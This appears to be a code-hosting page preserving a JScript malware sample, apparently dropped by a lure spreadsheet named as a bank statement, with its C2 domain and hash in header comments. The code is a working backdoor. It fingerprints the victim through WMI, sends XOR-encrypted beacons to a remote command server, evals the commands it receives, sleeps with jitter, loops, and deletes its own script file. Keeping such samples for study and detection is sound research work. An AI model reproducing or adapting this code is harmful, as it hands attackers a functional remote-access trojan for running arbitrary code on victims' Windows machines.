Permalink
May 13, 2019
Newer
100644
159 lines (153 sloc)
6.16 KB
1
// Bank Statement James Fifeman.xls
2
// C2: hxxps://msdn-update[.]com/
3
// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1
4
5
function anonymous() {
6
var zbegbiwhuhro = "&id=";
7
var ihebgysipc = "fetch";
8
var yfusrihyny = "";
9
var tindajrurke = "get_image";
10
var ytysqyprozlibx = "string";
11
var otocywviso = "no";
12
var otbybimollu = "Unknown";
13
var evaritpequx = "Scripting.FileSystemObject";
14
var yqpawymfikorh = "_";
15
var koficijojhi = "/";
16
var inoxhegzajw = "action=get_command";
17
var ihunuxfip = "request";
18
var edomsecejso = "z";
19
var lwilpotasvo = "create_logo";
20
var vimkiwono = "string";
21
var pidwagunit = "%APPDATA%";
22
var gqyxqohoftupi = "winmgmts:root/CIMV2";
23
var erzirolonje = "create_image";
24
var esajigfown = "decrypt";
25
var ewypetevhu = "?request=page";
26
var bgixmabefzaqnu = "show_ico";
27
var huzzakrowopvu = "";
28
var zexygrogy = "";
29
var iwpodhexzubc = "images";
30
var bbymyruztovpi = "WScript.Shell";
31
var xaprislyhbulf = "show_jpg";
32
var inbypzethezag = "&";
33
var ucmomadgib = "request";
34
var vjiwumhojarse = "group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=";
35
var cedlihrijalti = "?request=content&id=";
36
var kyppaltuwti = "image";
37
var ejogamygpu = "MSXML2.ServerXMLHTTP";
38
var cylofalpitx = "content";
39
var fifuwacdez = "encrypt";
40
var atkudecaxme = "decrypt";
41
var obawufdoxsa = "";
42
var bhomnismictu = "encrypt";
43
var ocsekeltan = "show_png";
44
var vivijsozvali = "User-Agent";
45
var yracypcamos = "no";
46
var kexerobi = "cdn";
47
var inamvagtixjyxj = "POST";
48
var usubhejreva = "_";
49
var jaxylibpafl = "";
50
var hbanamyklujt = "";
51
var bvaxoqwetmodg = "agyjabam=";
52
var ditevnaqa = "https://msdn-update.com/";
53
var wegmexxabha = "POST";
54
var dnanehmufride = "encrypt";
55
var fypalygos = "application/x-www-form-urlencoded";
56
var urmuqizemz = "Content-Type";
57
58
function id() {
59
var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
60
var lItems = new Enumerator(lrequest);
61
for (; !lItems.atEnd(); lItems.moveNext()) {
62
var mac = lItems.item().macaddress;
63
var dns_hostname = lItems.item().DNSHostName;
64
if (typeof mac === vimkiwono && mac.length > 1) {
65
if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {
66
dns_hostname = otbybimollu;
67
} else {
68
for (var i = 0; i < dns_hostname.length; i++) {
69
if (dns_hostname.charAt(i) > edomsecejso) {
70
dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);
71
}
72
}
73
}
74
return mac + yqpawymfikorh + dns_hostname;
75
}
76
}
77
}
78
79
function crypt_controller(type, request) {
80
var encryption_key = obawufdoxsa;
81
if (type === esajigfown) {
82
request = unescape(request);
83
var request_split = request.split(")*(");
84
request = request_split[0];
85
encryption_key = request_split[1].split(obawufdoxsa);
86
} else {
87
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);
88
request = unescape(encodeURIComponent(request));
89
}
90
var output = new Array(request.length);
91
for (var i = 0; i < request.length; i++) {
92
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
93
output[i] = String.fromCharCode(charCode);
94
}
95
var result_string = output.join(obawufdoxsa);
96
if (type === fifuwacdez) {
97
result_string = result_string + ")*(" + encryption_key.join(obawufdoxsa);
98
result_string = escape(result_string);
99
}
100
return result_string;
101
}
102
103
function get_path() {
104
var pathes = [iwpodhexzubc, kyppaltuwti, cylofalpitx, ihebgysipc, kexerobi];
105
var files = [lwilpotasvo, tindajrurke, erzirolonje, bgixmabefzaqnu, ocsekeltan, xaprislyhbulf];
106
var path = pathes[Math.floor(Math.random() * pathes.length)] + koficijojhi + files[Math.floor(Math.random() * files.length)];
107
return ditevnaqa + path;
108
}
109
110
function send_data(type, data, crypt) {
111
try {
112
var http_object = new ActiveXObject(ejogamygpu);
113
if (type === ucmomadgib) {
114
http_object.open(inamvagtixjyxj, get_path() + ewypetevhu, false);
115
data = bvaxoqwetmodg + crypt_controller(fifuwacdez, vjiwumhojarse + uniq_id + zbegbiwhuhro + id() + inbypzethezag + data);
116
} else {
117
http_object.open(inamvagtixjyxj, get_path() + cedlihrijalti + uniq_id, false);
118
if (crypt) {
119
data = crypt_controller(fifuwacdez, data);
120
}
121
}
122
http_object.setRequestHeader(vivijsozvali, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
123
http_object.setRequestHeader(urmuqizemz, fypalygos);
124
http_object.setOption(2, 13056);
125
http_object.send(data);
126
return http_object.responseText;
127
} catch (e) {
128
return otocywviso;
129
}
130
}
131
132
function main() {
133
var ncommand = obawufdoxsa;
134
ncommand = send_data(ucmomadgib, inoxhegzajw, true);
135
if (ncommand !== otocywviso) {
136
try {
137
eval(crypt_controller(esajigfown, ncommand));
138
} catch (e) {}
139
}
140
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
141
WScript.Sleep(random_knock);
142
main();
143
}
144
var first = false;
145
var shell = new ActiveXObject(bbymyruztovpi);
146
var fso = new ActiveXObject(evaritpequx);
147
var wmi = GetObject(gqyxqohoftupi);
148
var uniq_id = new Date().getUTCMilliseconds();
149
var app_path = shell.expandEnvironmentStrings(pidwagunit);
150
if (fso.GetFolder(app_path).Type.length > 5) {
151
fso.deleteFile(WScript.ScriptFullName);
152
try {
153
WScript.Sleep(120000);
154
main();
155
} catch (e) {
156
main();
157
}
158
}
159
}